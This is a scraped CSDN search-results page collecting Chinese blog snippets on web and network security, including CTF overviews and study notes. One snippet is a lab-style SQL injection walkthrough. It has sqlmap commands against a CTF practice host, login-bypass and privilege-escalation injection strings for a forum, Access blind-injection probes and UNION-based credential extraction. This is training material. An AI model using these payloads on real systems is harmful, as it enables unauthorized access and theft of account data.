精华内容
下载资源
问答
  • 最近开始学习网络安全相关知识,接触了好多新术语,感觉自己要学习的东西太多,真是学无止境,也发现了好几个默默无闻写着博客、做着开源的大神。准备好好学习下新知识,并分享些博客与博友们一起进步,加油。非常...

    最近开始学习网络安全相关知识,接触了好多新术语,感觉自己要学习的东西太多,真是学无止境,也发现了好几个默默无闻写着博客、做着开源的大神。准备好好学习下新知识,并分享些博客与博友们一起进步,加油。非常基础的文章,大神请飘过,谢谢各位看官!

    投票闲谈:
    最后希望大家帮我2019年CSDN博客之星投投票,每天可以投5票喔,谢谢大家!八年,在CSDN分享了410篇文章,15个专栏,400多万人次浏览,包括Python人工智能、数据挖掘、网络爬虫、图象处理、网络安全、JAVA网站、Android开发、LAMP/WAMP、C#网络编程、C++游戏、算法和数据结构、面试总结、人生感悟等。当然还有我和你的故事,感恩一路有你,感谢一路同行,希望通过编程分享帮助到更多人,也希望学成之后回贵州教更多学生。因为喜欢,所以分享,且看且珍惜,加油!等我四年学成归来~

    投票地址:http://m234140.nofollow.ax.mvote.cn/opage/ed8141a0-ed19-774b-6b0d-39c3aaf89dde.html?from=singlemessage

    在这里插入图片描述

    下载地址:

    展开全文
  • 这是作者的系列网络安全自学教程,主要是关于网安工具实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意...

    这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。

    作者作为网络安全的小白,分享一些自学基础教程给大家,希望你们喜欢。同时,更希望你能与我一起操作深入进步,后续也将深入学习网络安全和系统安全知识并分享相关实验。总之,希望该系列文章对博友有所帮助,写文不容易,大神请飘过,不喜勿喷,谢谢!

    PS:本文参考了千锋教育(DNSec-leo)的课程和小迪安全文章,结合自己的经验及资料进行撰写,也推荐大家阅读B站相关视频,详见参考文献。

    下载地址:https://github.com/eastmountyxz/NetworkSecuritySelf-study

    展开全文
  • ctf网络安全大赛web

    千次阅读 2019-11-09 19:53:27
    一、解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值时间来排名,通常用于在线选拔...

    CTF竞赛模式分为以下三类:

    一、解题模式(Jeopardy)在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别。

    二、攻防模式(Attack-Defense)在攻防模式CTF赛制中,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。攻防模式CTF赛制可以实时通过得分反映出比赛情况,最终也以得分直接分出胜负,是一种竞争激烈,具有很强观赏性和高度透明性的网络安全赛制。在这种赛制中,不仅仅是比参赛队员的智力和技术,也比体力(因为比赛一般都会持续48小时及以上),同时也比团队之间的分工配合与合作。

    三、混合模式(Mix)结合了解题模式与攻防模式的CTF赛制,比如参赛队伍通过解题可以获取一些初始分数,然后通过攻防对抗进行得分增减的零和游戏,最终以得分高低分出胜负。采用混合模式CTF赛制的典型代表如iCTF国际CTF竞赛

    其中我主要介绍一下web方向所需要做的事情
    Web - 网络攻防
    主要介绍了 Web 安全中常见的漏洞,如 SQL 注入、XSS、CSRF、文件包含、文件上传、代码审计、PHP 弱类型等,Web 安全中常见的题型及解题思路,提供了一些常用的工具。
    在这里插入图片描述

    其中ctf大赛web方向是涉及操作系统和 Web 系统安全,包括 Web 网站多种语言源代码审计分析(特别是 PHP)、数据库管理和 SQL 操作、Web 漏洞挖掘和利用(如 SQL 注入和 XSS)、服务器提权、编写代码补丁并修复网站漏洞等安全技能。
    我们所用到的系统以及软件主要有:Kali2、CentOS7、Burpsuite,Kali和CentOS

    展开全文
  • 网络安全Web安全基础

    千次阅读 2018-03-22 20:25:34
    本博客题库来源于 实验吧使用Sqlmap进行SQL注入1. 搭建python2.7的环境2....`在这里查看到了该Web服务的容器是用的Apache 后台使用PHP写的,数据库用的是MYSQL3. 查看MYSQL中所有的数据库D:\ustb\N...

    本博客题库来源于 实验吧


    使用Sqlmap进行SQL注入

    1. 搭建python2.7的环境

    2. 启动Sqlmap 连接URL

    `python2 sqlmap.py -u"http://ctf5.shiyanbar.com/8/index.php?id=1"`


    在这里查看到了该Web服务的容器是用的Apache 后台使用PHP写的,数据库用的是MYSQL

    3. 查看MYSQL中所有的数据库

    D:\ustb\NetworkSecurity\sqlmapproject-sqlmap-7d5a0ed>python2sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" –dbs

    可以看到有三个数据库


    4.查看数据库中的表

    D:\ustb\NetworkSecurity\sqlmapproject-sqlmap-7d5a0ed>python2sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" –D my_db--tables

     

    这个数据库中有两张表

    5.查看表中的列

    D:\ustb\NetworkSecurity\sqlmapproject-sqlmap-7d5a0ed>python2sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -Tthiskey –columns


    可以看到这个表有一列,名字叫做K0y

    6.查看表中的行中的详细数据

    D:\ustb\NetworkSecurity\sqlmapproject-sqlmap-7d5a0ed>python2sqlmap.py -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -Tthiskey -C k0y --dump

     

    使用AWVS扫描漏洞

    1.打开工具,输入要扫描的IP


    2.开始扫描


    扫描之后发现有SQL注入和CSS跨站攻击的漏洞

    3.使用爬虫工具

    使用Site Crawler抓取服务器目录下所有的目录结构:


    手工SQL注入

    1.访问一个有SQL漏洞的站点


    2.绕过登录验证

    我们想登录必须知道用户名和密码

    在后台我们登录的时候,查询的SQL应该这样写:

    SELECT user_id, user_type, email FROM users WHEREuser_id = '用户名' AND password = ‘密码’

    假如我们提交的表单是admin  和 2’ or 1’

    我们查询的SQL就变成了这样:

    SELECT user_id, user_type, email FROM users WHEREuser_id = 'admin' AND password = ‘2’ or '1'

    要注意由于运算符优先级的问题,我们的SQL被拆成了两个部分:

    SELECT user_id, user_type, email FROM usersWHERE user_id = 'admin' AND password = ‘2’) (or '1'

    这样不管我们前面的账号密码是什么都被短路了,逻辑恒为真,也就绕过了登录验证,进入了后台

     

    论坛经典漏洞渗透

    1.首先注册一个账号


    这里账号密码是 san 123456

    2.测试注入点

    使用

    账号:san’ and ‘a’ = ‘a

    密码:1234567


    发现登录失败,但是可以发现我们提交的表单已经插入到了查询的SQL中了

    4.提升用户权限

    之后我们尝试把我们当前用户提升权限。

    在用户名提交的表单的地方,插入提升权限的SQL,密码是正确的密码

    ';update dv_user setusergroupid=1 where username='san'--


    这是虽然显示用户不存在,但是我们正常的登录一下


    这时候我们就惊讶的发现我们从一个普通用户变为了管理员了

    5.添加管理员,登录后台

    下面让我们添加一个管理员账号

    san';insert into dv_admin(username,password,flag,adduser)values('san','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','san')—

    这样我们就在后台创建一个管理员,这个网站就取得了最高权限

     

    手工注入Access数据库

    1.找到有漏洞的注入点

    在url后面添加一个 ’


    在url后面添加一个 and 1 = 1

    页面正常


    在URL后面加入一个 and 1 = 2


    经过上面的测试可以发现存在漏洞

    2.猜解表名

    在url后面添加and exists(select *from admin)

    发现页面正常,说明存在这张表


    3.猜解列名

    在url后面添加and exists(select admin from admin) 和  and exists(select password from admin)

    发现页面正常,说明存在这两个列名

    4.猜测字段长度

    在url后面添加and (select top 1 len (admin) from admin > 1)

    如果这时候显示正常,就说明这个数据的长度大于1

    然后依次加一,直到页面报错,这时候输入的是5,所以长度就是5


    5.猜测字段内容

    然后在URL后面添加and (select top 1 asc(mid(admin,1,1)) from admin) > 97

    这时候报错,也就是说第一个字符的ASCII码是97 也就是a

    6.依次多次操作上面两步,就能猜测出正确的账号和密码

     

    联合查询SQL注入

    在刚才实验的基础上,我们使用

    Order by11 判断字段的数目

    Union select1,2,3,4,5,6,7,8,9,10,11 from admin 来判断字段的编号

    Union select 1,admin,password,4,5,6,7,8,9,10,11from admin来直接得到管理员的账户和面

     

    使用DVWA进行SQL注入

    1.Low级别的注入

    通过1‘ or ’1’ = ‘1’来遍历数据库当中的元素



    展开全文
  • 广西首届网络安全选拔赛 WEB Writeup

    万次阅读 2016-02-03 18:15:35
    WEB安全(WEB) WEB 题型就是最大众化的WEB漏洞的考察了,他会涉及到注入,代码执行,文件包含等常见的WEB漏洞。 管理员的愤怒 分值:100 靶机:192.168.43.134 阿水是某部门的网站管理员,一天他发现自己管理的网站...
  • 网络安全-WEB中的常见编码

    千次阅读 2021-01-04 20:37:27
    编码(encode)解码(decode)是相当广泛的话题,设计计算机对信息处理的方式,常见于加解密中,当然学习WEB也要了解一些常见的编码,可在攻击中使用编码绕过。 ASCII编码 ASCII (American Standard Code for ...
  • 本篇文章分享实验吧CFT实战的题目,涉及WEB渗透隐写术常见题型,包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”“隐写术之水果、小苹果”。非常有意思的文章,作为在线...
  • 攻击前:网络踩点、网络扫描、网络查点 攻击中:利用漏洞信息进行渗透攻击、获取权限 攻击后:后渗透维持攻击、文件拷贝、木马植入、痕迹擦除 xss 如何防御 1. 对前端输入做过滤编码: 比如只允许输入指定...
  • 网络安全-自学笔记

    万次阅读 多人点赞 2020-06-16 17:29:55
    目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell ...WEB(应用)安全 ...网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
  • 米斯特web渗透测试网络安全洞察安全视频教程

    千次阅读 热门讨论 2019-03-10 14:38:57
    本教程是米斯特最新的一期web渗透测试教程—洞察安全视频教程,也是米斯特出品的最后一期渗透测试教程...day01-WEB安全基础 day02-WEB安全漏洞攻防-基础-弱口令、HTML注入 day03-WEB安全漏洞攻防-基础-XSS漏洞 day04...
  • 3.你获取网络安全知识途径有哪些? 4.什么是CC攻击? 5.Web服务器被入侵后,怎样进行排查? 6.dll文件是什么意思,有什么用?DLL劫持原理 7.0day漏洞 8.Rootkit是什么意思 9.蜜罐 10.ssh 11.DDOS 12.震网病毒: 13....
  • 最近经常听到公司的招聘专员反馈应聘者简历“水分”太大,尤其是技术岗位,例如Web安全工程师,明明是初级阶段的菜鸟,就敢写资深Web安全工程师;在几个项目做一些基础打杂的工作,就敢写带过团队,项目经验丰富;挖...
  • 这是作者的系列网络安全自学教程,主要是关于网安工具实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Wireshark抓包原理知识,并结合NetworkMiner工具抓取了图像资源用户名密码...
  • [网络安全学习篇50]:Web架构安全分析

    千次阅读 热门讨论 2020-04-25 20:57:15
    引言:我的系列博客[网络安全学习篇]上线了, Web 工作机制 网页、网站 Web容器 静态页面 中间件服务器 数据库的出现 HTTP 协议概述
  • 2020宁波市第三届网络安全大赛,比赛分行业组院校组进行团体赛。感觉这次比赛还是很不错的~ 值得参加。 Easy_SSRF <?php show_source(__FILE__); $ch = curl_init(); curl_setopt($ch, CURLOPT...
  • Web渗透技术的核心是发现Web漏洞,发现漏洞有手工软件自动化扫描两种方式。对于用户验证漏洞、用户凭证管理问题、SQL注入等常见Web漏洞,都可以通过Web扫描器进行扫描。各个扫描器的功能结果都不同,常见的包括...
  • WEB服务器FTP服务器 WEB服务器 3、端口号 4、WEB服务器发布软件: 5、部署web服务器 6、练习测试 7、网站类型 FTP服务器: 2、端口号: 3、FTP工作模式; 4、配置FTP服务器 WEB服务器FTP服务器 WEB...
  • 网络安全Web-safe)字体

    千次阅读 2017-07-16 22:18:14
    参考链接: ...通常情况我们无需指定特别“花哨”的字体,常见的字体即可,但是对于不同计算机他们本次存储的字体又不尽相同,不同系统之间的更是如此,比如windowsmac
  • 第四届红帽杯网络安全大赛 Web 部分writeup

    千次阅读 多人点赞 2021-05-09 22:34:40
    记录一下web的wp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问...
  • 这是作者的网络安全自学教程系列,主要是关于安全工具实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件...
  • web网络安全——网站入侵(一)

    千次阅读 2016-12-18 21:22:56
    非技术应用web基本知识,对目标网站进行初步的了解(包括web框架、服务器等),对网站入侵难度有初步的了解; 基本步骤: 1) 结合浏览器前端调试功能(F12快捷键),抓包以及在线测试网站( ...
  • web网络安全——网站入侵(二)

    千次阅读 2016-12-21 21:43:11
    此网站有一个360安全检测网站,这个网评分是99 http://XX.XX.XX.XX/search_list.jsp?wbtreeid=1001 搜索框页面 详细分析第二步网页源代码: i. http://XX.XX.XX.XX/search_list.jsp?wbtreeid=1001 带有...
  • 整体而言,比赛题目的水准仍然非常高,尤其是REPWN,包括Web,所以还是有很多知识点值得我们学习的。最后,非常感谢参考文献的大佬们,尤其是Nu1L战队(推荐VX关注他们),也感谢许多参加比赛的伙伴博友们。如果...
  • 这是作者的系列网络安全自学教程,主要是关于网安工具实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Python弱口令攻击、自定义字典生成,调用Python的exrex库实现,并结合...
  • 网络爬虫与Web安全

    千次阅读 2012-11-25 10:27:10
    网络爬虫(Web Crawler),又称网络蜘蛛(Web Spider)或网络机器人(Web Robot),是一种按照一定的规则自动抓取万维网资源的程序或者脚本,已被广泛应用于互联网领域。搜索引擎使用网络爬虫抓取Web网页、文档甚至...
  • 这是作者的网络安全自学教程系列,主要是关于安全工具实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,...
  • 这是作者的系列网络安全自学教程,主要是关于网安工具实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Powershell基础入门知识,涉及条件语句、循环语句、数组、函数 、字符串操作...
  • Web安全攻防

    千次阅读 多人点赞 2018-04-11 15:39:49
    参考网址:【干货分享】Web安全漏洞深入分析及其安全编码常见 Web 安全攻防总结Web 安全入门之常见攻击来一张镇博图:安全无小事。1.XSS介绍:全英Cross Site Script,跨站脚本攻击。原理:攻击者在Web页面中插入...
  • 网络安全提高班”新的100篇文章即将开启,包括Web渗透、内网渗透、靶场搭建、CVE复现、攻击溯源、实战及CTF总结,它将更加聚焦,更加深入,也是作者的慢慢成长史。第一篇文章将带领大家了解网络安全攻防知识点,并...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 466,545
精华内容 186,618
关键字:

网络安全和web安全